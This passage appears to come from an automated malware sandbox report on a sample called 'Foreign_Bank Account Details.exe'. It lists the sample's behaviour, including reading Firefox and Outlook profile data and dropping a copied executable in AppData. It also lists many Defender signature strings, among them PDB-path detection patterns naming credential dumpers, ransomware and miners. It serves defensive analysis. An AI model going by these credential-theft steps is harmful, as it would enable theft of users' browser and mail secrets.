Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT (SELECT COUNT(*) FROM File) + (SELECT COUNT(*) FROM FileInstance);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFB1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle, 42_2_00007FF650CFB1C4
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5224:304:WilStaging_02
Source: Foreign_Bank Account Details.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\tKZVPq
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 42_2_00007FF650CEB0C8
Source: Foreign_Bank Account Details.exe ReversingLabs: Detection: 33%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: he#@1.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: mgr.pdb source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp
Source: Binary string: bot.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: comp.pdbd source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: obj\Debug\WinCalendar.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: Qc:\users\mz\documents\visual studio 2013\Projects\Shellcode\Release\Shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: .+:\\.+\\.*Pedro\\.*PH_Secret_Application.*\\PH_Secret_Application.*\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp
Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp
Source: Binary string: out\Release\360EntClient.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp
Source: Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp
Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp
Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
